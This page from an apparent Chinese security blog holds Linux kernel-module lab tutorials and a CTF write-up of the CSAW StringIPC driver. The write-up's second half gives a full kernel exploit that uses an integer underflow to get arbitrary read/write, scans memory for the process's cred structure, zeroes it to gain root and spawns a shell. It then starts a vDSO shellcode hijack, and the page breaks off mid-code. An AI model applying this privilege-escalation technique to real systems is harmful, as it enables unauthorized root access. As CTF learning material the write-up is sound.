Pwn进你的心

Linux-Lab1-Kernel modules

Posted on 2022-10-10 In Knowledge 11k 10 mins.

Kernel modules

创建简单模块
描述内核模块编译的过程
介绍如何将模块与内核一起使用
简单的内核调试方法

An example of a kernel module

下面是一个非常简单的内核模块示例：（源代码在 linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.c 文件中）

当加载到内核中时，它将生成消息 “Hello”
卸载内核模块时，将生成消息 “Goodbye”

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>

MODULE_DESCRIPTION("Simple module");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static int my_hello_init(void)
{
	pr_debug("Hello!\n");
	return 0;
}

static void hello_exit(void)
{
	pr_debug("Goodbye!\n");
}

module_init(my_hello_init);
module_exit(hello_exit);

生成的消息不会显示在控制台上，但会保存在为此专门保留的内存区域中，日志记录守护程序（syslog）将从中提取这些消息
要显示内核消息，可以使用 dmesg 命令或检查日志

Compiling kernel modules

编译内核模块不同于编译用户程序：

首先，应使用其他标头（#include<>）
此外，模块不应链接到库
最后，必须使用与加载模块的内核相同的选项来编译模块

由于上述原因，有一种标准方法用于编译内核，这种方法需要两个文件 Makefile Kbuild

Makefile：

KDIR = /lib/modules/`uname -r`/build

kbuild:
        make -C $(KDIR) M=`pwd`
clean:
        make -C $(KDIR) M=`pwd` clean

/lib/modules 里面是内核模块，具有用于构建源代码的软链接
“-C” 选项的作用是：
- 指将当前工作目录转移到你所指定的位置：/lib/modules/`uname -r`/build
“M=” 选项的作用是：
- 当用户需要以某个内核为基础编译一个外部模块的话，需要在命令中加入 M=dir
- 程序会自动到你所指定的 dir 目录中查找模块源码，将其编译，生成KO文件
先设置当前工作目录为 KDIR（为了使用其“用于构建源代码的软链接”），然后在 kbuild 文件中寻找模块源码，最后使用 KDIR 中的软链接进行编译

Kbuild：

1
2
3

ccflags-y = -Wno-unused-function -Wno-unused-label -Wno-unused-variable -DDEBUG

obj-m = hello_mod.o

Kbuild 中具有具体的编译参数，并且会指定模块源码的名称

直接使用 make 命令就可以编译：

➜  1-2-test-mod git:(master) ✗ make      
make -C /lib/modules/`uname -r`/build M=`pwd`
make[1]: 进入目录“/usr/src/linux-headers-5.15.0-48-generic”
  CC [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.o
  MODPOST /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/Module.symvers
  CC [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.mod.o
  LD [M]  /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko
  BTF [M] /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko
Skipping BTF generation for /home/yhellow/linux/tools/labs/skels/kernel_modules/1-2-test-mod/hello_mod.ko due to unavailability of vmlinux
make[1]: 离开目录“/usr/src/linux-headers-5.15.0-48-generic”

不过这是内核模块的标准编译方式，使用了本机的 /lib/modules/

如果想编译用于虚拟机的内核模块，则需要对 KDIR 作出修改：

1	KDIR = /home/yhellow/linux

如果编译时需要使用多个子模块，就使用如下 Kbuild 示例：（示例文件在 linux/tools/labs/skels/kernel_modules/4-multi-mod 目录中）

ccflags-y = -Wno-unused-function -Wno-unused-label -Wno-unused-variable

obj-m        = supermodule.o
supermodule-y = mod1.o mod2.o

Loading/UnLoading a kernel module

要装入内核模块，使用 insmod 命令

要从内核中卸载模块，使用 rmmod 命令

1 2	insmod module.ko rmmod module.ko

加载内核模块时，将执行指定为宏参数的例程
同样，当卸载模块时，将执行指定为参数的例程

加载/卸载内核模块的完整示例如下所示：

➜  1-2-test-mod git:(master) ✗ sudo insmod hello_mod.ko
➜  1-2-test-mod git:(master) ✗ dmesg | tail -1
[ 1817.709484] Hello!
➜  1-2-test-mod git:(master) ✗ ls /sys/module | grep hello 
hello_mod

➜  1-2-test-mod git:(master) ✗ sudo rmmod hello_mod.ko 
➜  1-2-test-mod git:(master) ✗ dmesg | tail -2            
[ 1817.709484] Hello!
[ 1943.965668] Goodbye!
➜  1-2-test-mod git:(master) ✗ ls /sys/module | grep hello

Kernel Module Debugging

对内核模块进行故障排除比调试常规程序要复杂得多：

内核模块中的错误可能导致阻塞整个系统
故障排除速度大大减慢

为避免重新启动，建议使用虚拟机（qemu, virtualbox, vmware）

当包含错误的模块插入内核时，它最终会生成一个 kernel oops（内核警告）：

kernel oops 源自于内核检测到的无效操作，只能由内核生成
出现 kernel oops 后，内核将继续进行工作
kernel oops 将会作为一个消息，内核生成的消息被保存在日志中，可以使用 dmesg 命令显示

为了确保没有内核消息丢失，建议直接从控制台插入测试内核，或定期检查内核消息（值得注意的是，由于编程错误，也可能因硬件错误而发生 kernel oops）

相对应的，如果内核发生致命错误，则会产生 kernel panic（内核崩溃）：

出现 kernel panic 后，系统无法返回到稳定状态

看看下面的内核模块，其中包含一个生成 kernel oops 的错误：（源代码在 linux/tools/labs/skels/kernel_modules/5-oops-mod/oops_mod.c 文件中）

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/slab.h>

MODULE_DESCRIPTION("Oops generating module");
MODULE_AUTHOR("So2rul Esforever");
MODULE_LICENSE("GPL");

static int my_oops_init(void)
{
	char *p = 0;

	pr_info("before init\n");
	*p = 'a'; /* 空指针赋值 */
	pr_info("after init\n");

	return 0;
}

static void my_oops_exit(void)
{
	pr_info("module goes all out\n");
}

module_init(my_oops_init);
module_exit(my_oops_exit);

测试结果如下：

1 2	➜ 5-oops-mod git:(master) ✗ sudo insmod oops_mod.ko [1] 13015 killed sudo insmod oops_mod.ko

内核检测到了 kernel oops，并且 kill 掉了该进程，使用 dmesg 查看下系统日志：

➜  5-oops-mod git:(master) ✗ dmesg | tail -64
[  139.812510] before init
[  139.812512] BUG: kernel NULL pointer dereference, address: 0000000000000000
[  139.812515] #PF: supervisor write access in kernel mode
[  139.812516] #PF: error_code(0x0002) - not-present page
[  139.812517] PGD 0 P4D 0 
[  139.812519] Oops: 0002 [#1] SMP NOPTI
[  139.812521] CPU: 1 PID: 3543 Comm: insmod Tainted: G           OE     5.15.0-48-generic #54~20.04.1-Ubuntu
[  139.812523] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[  139.812524] RIP: 0010:my_oops_init+0x15/0x31 [oops_mod]
[  139.812528] Code: Unable to access opcode bytes at RIP 0xffffffffc0b1bfeb.
[  139.812528] RSP: 0018:ffffb1bb85c6bb98 EFLAGS: 00010246
[  139.812530] RAX: 000000000000000b RBX: 0000000000000000 RCX: 0000000000000027
[  139.812530] RDX: 0000000000000000 RSI: ffffb1bb85c6b9e0 RDI: ffff942775e60588
[  139.812531] RBP: ffffb1bb85c6bb98 R08: ffff942775e60580 R09: 0000000000000001
[  139.812532] R10: 0000000000000001 R11: 000000000000000f R12: ffffffffc0b1c000
[  139.812533] R13: ffff942695cb5ac0 R14: ffffffffc0b1e000 R15: 0000000000000000
[  139.812534] FS:  00007f0f977db740(0000) GS:ffff942775e40000(0000) knlGS:0000000000000000
[  139.812535] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  139.812536] CR2: ffffffffc0b1bfeb CR3: 00000001a9510003 CR4: 0000000000770ee0
[  139.812557] PKRU: 55555554
[  139.812558] Call Trace:
[  139.812559]  <TASK>
[  139.812561]  do_one_initcall+0x46/0x1e0
[  139.812565]  ? __cond_resched+0x19/0x40
[  139.812568]  ? kmem_cache_alloc_trace+0x15a/0x420
[  139.812571]  do_init_module+0x52/0x230
[  139.812574]  load_module+0x1376/0x1600
[  139.812576]  __do_sys_finit_module+0xbf/0x120
[  139.812578]  ? __do_sys_finit_module+0xbf/0x120
[  139.812579]  __x64_sys_finit_module+0x1a/0x20
[  139.812581]  do_syscall_64+0x59/0xc0
[  139.812583]  ? fput+0x13/0x20
[  139.812584]  ? ksys_mmap_pgoff+0x14b/0x2a0
[  139.812586]  ? exit_to_user_mode_prepare+0x3d/0x1c0
[  139.812588]  ? exit_to_user_mode_prepare+0x3d/0x1c0
[  139.812589]  ? syscall_exit_to_user_mode+0x27/0x50
[  139.812591]  ? __x64_sys_mmap+0x33/0x50
[  139.812592]  ? do_syscall_64+0x69/0xc0
[  139.812593]  ? do_syscall_64+0x69/0xc0
[  139.812594]  entry_SYSCALL_64_after_hwframe+0x61/0xcb
[  139.812596] RIP: 0033:0x7f0f9792173d
[  139.812598] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 23 37 0d 00 f7 d8 64 89 01 48
[  139.812599] RSP: 002b:00007ffdee07d0f8 EFLAGS: 00000246 ORIG_RAX: 0000000000000139
[  139.812600] RAX: ffffffffffffffda RBX: 000055e6a61767c0 RCX: 00007f0f9792173d
[  139.812601] RDX: 0000000000000000 RSI: 000055e6a5c91358 RDI: 0000000000000003
[  139.812602] RBP: 0000000000000000 R08: 0000000000000000 R09: 00007f0f979f8580
[  139.812602] R10: 0000000000000003 R11: 0000000000000246 R12: 000055e6a5c91358
[  139.812603] R13: 0000000000000000 R14: 000055e6a6176760 R15: 0000000000000000
[  139.812604]  </TASK>
[  139.812605] Modules linked in: oops_mod(OE+) isofs xt_conntrack xt_MASQUERADE nf_conntrack_netlink nfnetlink xfrm_user xfrm_algo xt_addrtype iptable_filter iptable_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 libcrc32c bpfilter br_netfilter bridge stp llc rfcomm aufs overlay bnep vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock binfmt_misc nls_iso8859_1 intel_rapl_msr intel_rapl_common kvm_intel kvm crct10dif_pclmul ghash_clmulni_intel aesni_intel crypto_simd vmw_balloon cryptd btusb input_leds btrtl btbcm btintel bluetooth joydev serio_raw ecdh_generic ecc vmw_vmci mac_hid sch_fq_codel vmwgfx ttm drm_kms_helper cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt msr parport_pc ppdev drm lp parport ip_tables x_tables autofs4 hid_generic crc32_pclmul usbhid ahci libahci psmouse hid e1000 mptspi pata_acpi mptscsih mptbase i2c_piix4 scsi_transport_spi
[  139.812636] CR2: 0000000000000000
[  139.812637] ---[ end trace 840a29bcd63bee0c ]---
[  139.812638] RIP: 0010:my_oops_init+0x15/0x31 [oops_mod]
[  139.812640] Code: Unable to access opcode bytes at RIP 0xffffffffc0b1bfeb.
[  139.812641] RSP: 0018:ffffb1bb85c6bb98 EFLAGS: 00010246
[  139.812642] RAX: 000000000000000b RBX: 0000000000000000 RCX: 0000000000000027
[  139.812642] RDX: 0000000000000000 RSI: ffffb1bb85c6b9e0 RDI: ffff942775e60588
[  139.812643] RBP: ffffb1bb85c6bb98 R08: ffff942775e60580 R09: 0000000000000001
[  139.812644] R10: 0000000000000001 R11: 000000000000000f R12: ffffffffc0b1c000
[  139.812644] R13: ffff942695cb5ac0 R14: ffffffffc0b1e000 R15: 0000000000000000
[  139.812645] FS:  00007f0f977db740(0000) GS:ffff942775e40000(0000) knlGS:0000000000000000
[  139.812646] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  139.812647] CR2: ffffffffc0b1bfeb CR3: 00000001a9510003 CR4: 0000000000770ee0
[  139.812664] PKRU: 55555554

不仅标识出了触发 kernel oops 的原因，还给出了触发的位置 my_oops_init+0x15

Exercises

要解决练习，您需要执行以下步骤：

从模板中准备 skeletons（具体来说就是 linux/tools/labs/skels 文件夹）
构建模块
将模块复制到虚拟机
启动 VM 并在 VM 中测试模块

下面的练习我就挑几个有意思的挂在博客上：

6.Module parameters：

编译并复制关联的模块
并加载内核模块以查看 printk 消息
然后从内核中卸载模块

在正常情况下载入模块，是如下的结果：

1
2
3

root@qemux86:~/skels/kernel_modules/6-cmd-mod# insmod cmd_mod.ko                
cmd_mod: loading out-of-tree module taints kernel.                              
Early bird gets the worm

我们的目标就是把输出的 Early bird gets the worm 改为 Early bird gets tired

#include <linux/module.h>
#include <linux/init.h>
#include <linux/kernel.h>

MODULE_DESCRIPTION("Command-line args module");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static char *str = "the worm";

module_param(str, charp, 0000);
MODULE_PARM_DESC(str, "A simple string");

static int __init cmd_init(void)
{
	pr_info("Early bird gets %s\n", str);
	return 0;
}

static void __exit cmd_exit(void)
{
	pr_info("Exit, stage left\n");
}

module_init(cmd_init);
module_exit(cmd_exit);

module_param 表示向当前模块传入参数
通过如下命令就可以指定参数：

1 2	root@qemux86:~/skels/kernel_modules/6-cmd-mod# insmod cmd_mod.ko str=tired Early bird gets tired

7.Proc info：

添加代码以显示当前进程的进程ID和可执行文件名称

#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
/* TODO: add missing headers */
#include <linux/sched.h>

MODULE_DESCRIPTION("List current processes");
MODULE_AUTHOR("Kernel Hacker");
MODULE_LICENSE("GPL");

static int my_proc_init(void)
{
	struct task_struct *p;
	struct list_head * pos;

	/* TODO: print current process pid and its name */
	p = current;
	pr_info("current pid: %d\n",p->pid);
	pr_info("current name: %s\n",p->comm);
	/* TODO: print the pid and name of all processes */
	list_for_each(pos, &p->tasks)
	{
		p = list_entry(pos, struct task_struct, tasks);
		pr_info("current pid: %d\n",p->pid);
		pr_info("current name: %s\n",p->comm);
	}
	return 0;
}

static void my_proc_exit(void)
{
	/* TODO: print current process pid and name */
	struct task_struct *p;
	p = current;
	pr_info("current pid: %d\n",p->pid);
	pr_info("current name: %s\n",p->comm);
}

module_init(my_proc_init);
module_exit(my_proc_exit);

Linux-Lab0-Preparation

Posted on 2022-10-10 In Knowledge 2.8k 3 mins.

Experimental preparation

在 Github 上下载对应的实验文件：linux-kernel-labs/linux: Linux kernel source tree (github.com)

在 tools/labs 目录中输入命令：

1 2	make clean LABS=kernel_modules make skels

然后在 skels/kernel_modules 目录中就会有实验文件：

1
2
3

➜  labs git:(master) ✗ ls skels/kernel_modules/
1-2-test-mod  4-multi-mod  6-cmd-mod    8-kdb
3-error-mod   5-oops-mod   7-list-proc  9-dyndbg

Booting the virtual machine

虚拟机基础结构摘要：

~/src/linux：Linux 内核源代码，编译模块需要
~/src/linux/tools/labs/qemu：用于生成和运行 QEMU VM 的脚本和辅助文件

为了启动虚拟机，我们需要在 ~/src/linux/tools/labs 目录中使用 make boot 命令：

➜  labs git:(master) ✗ make boot 
make -C /home/yhellow/linux
make[1]: 进入目录“/home/yhellow/linux”
  SYSTBL  arch/x86/include/generated/asm/syscalls_32.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_32.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_64.h
  SYSHDR  arch/x86/include/generated/uapi/asm/unistd_x32.h
......

在默认情况下，您不会收到提示或任何图形界面，但您可以使用 minicom 或屏幕连接到虚拟机公开的控制台：

在 ~/src/linux/tools/labs 目录中使用 minicom -D serial.pts：

1	➜ labs git:(master) ✗ minicom -D serial.pts

Welcome to minicom 2.7.1

OPTIONS: I18n 
Compiled on Dec 23 2019, 02:06:26.
Port serial.pts, 19:21:44

Press CTRL-A Z for help on special keys

要访问虚拟机，请在登录提示符下输入用户名 root，无需输入密码
虚拟机将使用 root 帐户的权限启动

Poky (Yocto Project Reference Distro) 2.3 qemux86 /dev/hvc0

qemux86 login: root                                                 
root@qemux86:~# whoami                                                          
root                                                                            
root@qemux86:~#

Adding and using a virtual disk

在目录中，您有一个新的虚拟机磁盘，位于文件 ~/src/linux/tools/labs/mydisk.img，我们要将磁盘添加到虚拟机中，并在虚拟机中使用它

如果没有 mydisk.img 文件，则在如下网站中下载：mydisk.img

修改 ~/src/linux/tools/labs/qemu/Makefile，在对应位置添加如下代码：

-drive file=$(YOCTO_IMAGE),if=virtio,format=raw \
-drive file=disk1.img,if=virtio,format=raw \
-drive file=disk2.img,if=virtio,format=raw \
-drive file=mydisk.img,if=virtio,format=raw \ # new

启动虚拟机，创建目录并尝试挂载新磁盘

已经向 qemu 添加了两个磁盘（disk1.img 和 disk2.img）

1 2	root@qemux86:~# /dev/vd vda vdb vdc vdd

vda 是根分区，vdb 是 disk1.img，vdc 是 disk2.img，vdd 是 mydisk.img
无需在 /dev 中手动创建新磁盘的条目，因为虚拟机使用 devtmpfs（在 Linux 内核启动早期建立一个初步的 /dev，令一般启动程序不用等待 udev）
使用 mount 命令进行挂载：

1 2	mkdir /test mount /dev/vdd /test

结果挂载失败了（/test 中并没有出现 mydisk.img 中的文件），我们无法挂载虚拟磁盘的原因是，我们在内核中没有支持格式化的文件系统
您需要识别 mydisk.img 的文件系统，并编译对该文件系统的内核支持

1
2

➜  labs git:(master) ✗ file mydisk.img 
mydisk.img: BTRFS Filesystem sectorsize 4096, nodesize 4096, leafsize 4096, UUID=df3c665a-363d-46f8-aef0-f9959bad6832, 32768/104857600 bytes used, 1 devices

您需要在内核中启用 btrfs 支持并重新编译内核映像（退出前记得 save）

1
2
3

make menuconfig
----------------------------------------
File systems -> Btrfs filesystem support

root@qemux86:~# mount /dev/vdd /test                                            
BTRFS: device fsid df3c665a-363d-46f8-aef0-f9959bad6832 devid 1 transid 9 /dev/)
BTRFS info (device vdd): disk space caching is enabled                          
root@qemux86:~# ls /test                                                        
README                                                                          
root@qemux86:~# cat /test/README                                                
Congratulations, you were able to follow instructions!

GDB spelunking

使用 gdb 显示创建内核线程 kernel_thread 的函数的源代码

使用 gdb 查找内存中 jiffies 变量的地址及其内容
该变量保存自系统启动以来的计时周期数

要跟踪 jiffies 变量的值，请在 gdb 中使用动态分析，方法是：

先启动虚拟机
然后运行 make gdb 命令

PS：由于我这里的环境有点问题，所以我使用了 gdb vmlinux 外加 target remote :1234 的形式来进行调试（也可以参考一下）

1 2	pwndbg> x/gx & jiffies 0xc194b500 <jiffies_64>: 0x00000000ffff96c2

cred attack+vdso attack

Posted on 2022-10-08 In Reappearance 16k 14 mins.

StringIPC 复现

qemu-system-x86_64 \
    -m 512 \
    -kernel ./bzImage \
    -initrd ./rootfs.cpio \
    -append "console=ttyS0 root=/dev/ram rdinit=/sbin/init" \
    -nographic \
    -s \
    -cpu qemu64,+smep,+smap \
    -netdev user,id=t0, -device e1000,netdev=t0,id=nic0

smep，smap（这是我自己加的，原题没有）

#! /bin/sh
/bin/mount -a
mount -t proc none /proc
mount -t tmpfs -o size=64k,mode=0755 tmpfs /dev
mkdir /dev/pts
mount -t devpts devpts /dev/pts
mount -t sysfs sysfs /sys
sysctl -w kernel.hotplug=/sbin/mdev
ifconfig lo 127.0.0.1 netmask 255.255.255.0
route add -net 127.0.0.0 netmask 255.255.255.0 lo
insmod StringIPC.ko # 驱动模块
/sbin/mdev -s
echo "man, you got me" > flag
chmod 400 flag
chmod 766 /dev/csaw
nohup /sudo_timer &
setsid /bin/cttyhack setuidgid 1000 /bin/sh
poweroff -d 0  -f

漏洞分析

和 qwb2018-solid_core 的漏洞点一样：

buf_size = channel->buf_size;
ch1 = buf_size + id;
ch2 = buf_size - id;
if ( !key_s )
    ch1 = ch2;
data = (char *)krealloc(channel->data, ch1 + 1, 0x24000C0LL);

CSAW_SHRINK_CHANNEL 会导致 ch2 负数溢出为“-1”
krealloc(channel->data, 0, 0x24000C0LL) 返回“0”，使后面的 channel->data = 0，而 channel->buf_size 非常大

1 2	channel->data = data; channel->buf_size = ch1;

进而绕过后面的检查：

1 2	if ( channel_from.size + index_write > channel_write->buf_size ) goto LABEL_29;

入侵思路

在 qwb2018-solid_core 中，作者禁用了 “cred attack” 和 “vdso attack” 这两种方法，这里就来试一试

首先 WAA，RAA 的模板如下：

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;

    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

PS：由于驱动使用的 strncpy_from_user 会被 “\x00” 截断，所以 WAA 最好单字节多次输入

Cred Attack：

内核结构体 task_struct 用于对进程/线程的所有的相关的信息进行维护，并进行管理：

其中有个很重要的条目就是 *cred 指针，内核会根据 cred 结构体的内容来判断一个进程拥有的权限（如果 cred 结构体成员中的 uid-fsgid 都为 0，那一般就会认为进程具有 root 权限）
想要定位 task_struct 结构体中的 cred 指针，需要用到 task_struct 中的另一个条目 comm[TASK_COMM_LEN]：

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu		*real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu		*cred;

/*
 * executable name, excluding path.
 *
 * - normally initialized setup_new_exec()
 * - access it with [gs]et_task_comm()
 * - lock it with task_lock()
 */
char				comm[TASK_COMM_LEN];

comm 字符数组就在 *cred 相邻的下方，里面存放的这个字符串表示线程的名字（可以唯一确定），其内容可以通过 linux 的 prctl(PR_SET_NAME,name) 来设置指定的值
*real_cred 和 *cred 的值相同，可以用于判断是否找到 *cred
如果程序拥有局部 RAA，就可以通过扫描 comm 来找到 *cred

最后还需要确定一下扫描的范围：

0xffffffffffffffff  ---+-----------+----------------------------------------------
    8M                 |           | unused hole                                   
0xffffffffff7ff000  ---|-----------+------------| FIXADDR_TOP |-------------------
    1M                 |           |                                               
0xffffffffff600000  ---+-----------+------------| VSYSCALL_ADDR |-----------------
    548K               |           | vsyscalls                                    
0xffffffffff577000  ---+-----------+------------| FIXADDR_START |-----------------
    5M                 |           | hole                                         
0xffffffffff000000  ---+-----------+------------| MODULES_END |------------------- 
    1520M              |           | module mapping space (MODULES_LEN)           
0xffffffffa0000000  ---+-----------+------------| MODULES_VADDR |-----------------
    512M               |           | kernel text mapping, from phys 0         
0xffffffff80000000  ---+-----------+------------| __START_KERNEL_map |------------
    2G                 |           | hole                                 
0xffffffff00000000  ---+-----------+----------------------------------------------
    64G                |           | EFI region mapping space                     
0xffffffef00000000  ---+-----------+----------------------------------------------
    444G               |           | hole                                         
0xffffff8000000000  ---+-----------+----------------------------------------------
    16T                |           | %esp fixup stacks                             
0xffffff0000000000  ---+-----------+----------------------------------------------
    3T                 |           | hole                                         
0xfffffc0000000000  ---+-----------+----------------------------------------------
    16T                |           | kasan shadow memory (16TB)                   
0xffffec0000000000  ---+-----------+----------------------------------------------
    1T                 |           | hole                                         
0xffffeb0000000000  ---+-----------+----------------------------------------------
    1T                 |           | virtual memory map for all of struct pages   
0xffffea0000000000  ---+-----------+------------| VMEMMAP_START |-----------------
    1T                 |           | hole                                        
0xffffe90000000000  ---+-----------+------------| VMALLOC_END   |-----------------
    32T                |           | vmalloc/ioremap (1 << VMALLOC_SIZE_TB)       
0xffffc90000000000  ---+-----------+------------| VMALLOC_START |-----------------
    1T                 |           | hole                                         
0xffffc80000000000  ---+-----------+---------------------------------------------- 
    64T                |           | direct mapping of all phys. memory           
                       |           | (1 << MAX_PHYSMEM_BITS)                       
0xffff880000000000 ----+-----------+-----------| __PAGE_OFFSET_BASE | ------------
    8T                 |           | guard hole, reserved for hypervisor           
0xffff800000000000 ----+-----------+----------------------------------------------
                       |-----------| hole caused by [48:63] sign extension

0x0000800000000000 ----+-----------+----------------------------------------------
    PAGE_SIZE          |           | guard page                                   
0x00007ffffffff000 ----+-----------+--------------| TASK_SIZE_MAX | -------------- 
    128T               |           | different per mm                            
0x0000000000000000 ----+-----------+----------------------------------------------

直接映射区：0xffff880000000000 ~ 0xffffc80000000000（使用 kmalloc，分配的内存物理地址是连续的，虚拟地址也是连续的）
动态映射区：0xffffc90000000000 ~ 0xffffe90000000000（使用 vmalloc，分配的内存物理地址是不连续的，虚拟地址是连续的）
PS：cred 使用直接映射区

完整 exp 如下：

#include<stdio.h>
#include<stdlib.h>
#include<inttypes.h>
#include<sys/types.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <sys/auxv.h>
#include <string.h>
#include <stdbool.h>

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_CHANNEL  CSAW_IOCTL_BASE+1
#define CSAW_OPEN_CHANNEL   CSAW_IOCTL_BASE+2
#define CSAW_GROW_CHANNEL   CSAW_IOCTL_BASE+3
#define CSAW_SHRINK_CHANNEL CSAW_IOCTL_BASE+4
#define CSAW_READ_CHANNEL   CSAW_IOCTL_BASE+5
#define CSAW_WRITE_CHANNEL  CSAW_IOCTL_BASE+6
#define CSAW_SEEK_CHANNEL   CSAW_IOCTL_BASE+7
#define CSAW_CLOSE_CHANNEL  CSAW_IOCTL_BASE+8

void die(const char* msg)
{
    perror(msg);
    exit(-1);
}

struct alloc_channel_args {
    size_t buf_size;
    int id;
};

struct open_channel_args {
    int id;
};

struct grow_channel_args {
    int id;
    size_t size;
};

struct shrink_channel_args {
    int id;
    size_t size;
};

struct read_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct write_channel_args {
    int id;
    char *buf;
    size_t count;
};

struct seek_channel_args {
    int id;
    loff_t index;
    int whence;
};

struct close_channel_args {
    int id;
};

void RAA(int fd, int channel_id, void *read_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct read_channel_args read_channel;
    
    seek_channel.id = channel_id;
    seek_channel.index = addr-0x10;
    seek_channel.whence = SEEK_SET;
    ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

    read_channel.id = channel_id;
    read_channel.buf = (char*)read_buff;
    read_channel.count = len;
    ioctl(fd, CSAW_READ_CHANNEL, &read_channel);

    return;
}

void WAA(int fd, int channel_id, void* write_buff, uint64_t addr, uint32_t len)
{
    struct seek_channel_args seek_channel;
    struct write_channel_args write_channel;
    uint32_t i;
    for (i=0; i<len; i++){
        seek_channel.id = channel_id;
        seek_channel.index = addr-0x10+i;
        seek_channel.whence = SEEK_SET;
        ioctl(fd, CSAW_SEEK_CHANNEL, &seek_channel);

        write_channel.id = channel_id;
        write_channel.buf = (char*)write_buff+i;
        write_channel.count = 1;
        ioctl(fd, CSAW_WRITE_CHANNEL, &write_channel);
    }
    return;
}

int main()
{
    char name[20];
    struct alloc_channel_args channel_alloc;
    struct shrink_channel_args channel_shrink;
    int channel_id;
    char * read_buff = NULL;
    char * target = NULL;
    size_t cred_addr = -1;
    size_t real_cred_addr = NULL;
    char root_cred[28] = {0};

    int fd = open("/dev/csaw",O_RDWR);
    if(fd < 0){
        die("open error");
    }

    read_buff = (char*)malloc(0x1000);
    strcpy(name,"try2findmesauce");
    prctl(PR_SET_NAME,name);

    channel_alloc.buf_size = 0x100;
    channel_alloc.id = -1;
    ioctl(fd,CSAW_ALLOC_CHANNEL,&channel_alloc);
    if(channel_alloc.id == -1){
        die("alloc channel wrong");
    }
    else{
        printf("alloc channel id is :%d\n",channel_alloc.id);
    }

    channel_id = channel_alloc.id;
    channel_shrink.id = 1;
    channel_shrink.size = 0x101;
    ioctl(fd,CSAW_SHRINK_CHANNEL,&channel_shrink);

    for(size_t addr = 0xffff880000000000;addr < 0xffffc80000000000;addr+=0x1000){
        RAA(fd,channel_id,read_buff,addr,0x1000);
        target = memmem(read_buff,0x1000,name,16);
        if(target != NULL){
            cred_addr = *(size_t *)(target - 0x8);
            real_cred_addr =  *(size_t *)(target - 0x10);
            if(cred_addr == real_cred_addr){
                printf("found cred at 0x%lx\n",addr+target-(size_t)read_buff);
                printf("cred at 0x%lx\n",cred_addr);
                break;
            }
        }
    }

    if(cred_addr == -1){
        die("not find cred");
    }

    WAA(fd,channel_id,root_cred,cred_addr,28);
    if(getuid() == 0){
        printf("win~~~\n");
        system("/bin/sh");
    }else{
        die("fail");
    }
}

VDSO Attack：（Ret2dir 的一种）

VDSO 是内核为了减少内核与用户空间频繁切换，提高系统调用效率而提出的机制，支持的系统调用有4个：

gettimeofday()：把时间包装为一个结构体返回，包括秒，微妙，时区等信息
time()：获取当前的系统时间，返回一个大整数
getcpu()：获取CPU信息
clock_gettime()：用于计算精度和纳秒

入侵的思路很简单，就是利用 WAA 把 vdso 中用于替代系统调用的函数劫持为 shellcode，然后调用这些函数，获取 VDSO 基地址有如下步骤：

在高版本的 glibc 中，读取 ELF 辅助向量，计算 gettimeofday 字符串的偏移，用于在后续的爆破中判断是否找到 VDSO 基地址

int get_gettimeofday_str_offset() {
    size_t vdso_addr = getauxval(AT_SYSINFO_EHDR);
    char* name = "gettimeofday";
    if (!vdso_addr){
        printf("error get name's offset");
        return 0;
    }
    else{
        printf("vdso_addr in user: 0x%lx\n",vdso_addr);
    }
    size_t name_addr = memmem(vdso_addr, 0x1000, name, strlen(name));
    if (name_addr < 0) {
        printf("error get name's offset");
        return 0;
    }

    return name_addr - vdso_addr;
}

爆破获得 VDSO 地址，VDSO 是按页对齐的，且映射到空间的是个ELF文件

int offset = get_gettimeofday_str_offset();
for (uint64_t addr = 0xffff880000000000; addr<0xffffc80000000000; addr+=0x1000) {
